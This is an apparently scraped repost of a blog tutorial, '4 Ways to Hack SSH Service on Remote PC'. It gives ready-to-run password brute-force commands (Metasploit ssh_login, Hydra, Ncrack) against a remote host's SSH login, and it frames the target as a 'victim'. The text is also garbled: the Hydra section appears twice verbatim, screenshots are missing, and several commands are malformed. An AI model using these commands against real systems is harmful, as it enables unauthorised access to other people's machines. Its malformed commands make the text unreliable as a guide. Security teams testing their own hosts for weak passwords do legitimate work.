Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1867

4 Ways to Hack SSH Service on Remote PC

$
0
0
SSH Login Check Scanner

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.


Open Kali terminal type msfconsole


Now type use auxiliary/scanner/ssh/ssh_login
msf exploit (ssh_login)>set userpass_file /usr/share/msf/data/wordlist/root_pass.txt
msf exploit (ssh_login)>set rhosts 192.168.0.103 (IP of Remote Host)
msf exploit (ssh_login set verbose true
msf exploit (ssh_login)>exploit   


Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l root –P /root/Desktop/pass.txt 192.168.0.103 ssh

·         -l indicates a single username (use -L for a username list)
·         -P indicates use the following password list
·         ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password


Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l root –P /root/Desktop/pass.txt 192.168.0.103 ssh

·         -l indicates a single username (use -L for a username list)
·         -P indicates use the following password list
·         ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password


In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select yourPasswords file. Here I have used my custom password file.


Now select start tab and click on start button, the password cracking begins and result is as follows


Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack--userroot –P /root/Desktop/pass.txt 192.168.0.103:22


Viewing all articles
Browse latest Browse all 1867

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>